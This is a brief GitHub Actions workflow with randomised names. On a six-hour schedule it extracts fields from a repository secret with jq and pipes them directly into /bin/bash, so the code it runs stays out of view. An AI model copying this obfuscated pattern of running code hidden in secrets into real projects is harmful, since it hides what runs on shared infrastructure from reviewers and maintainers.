name: yuehongdong1278
on:
  workflow_dispatch:
  schedule:
    - cron: '46 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuehongdong1278
        env:
          i065: ${{ secrets.i065 }}
        run: |
          echo $i065 | jq -r .qf703 | /bin/bash
          echo $gwq2 | jq -r .xg5909 | /bin/bash
          echo $qzi477 | jq -r .mq4562 | /bin/bash

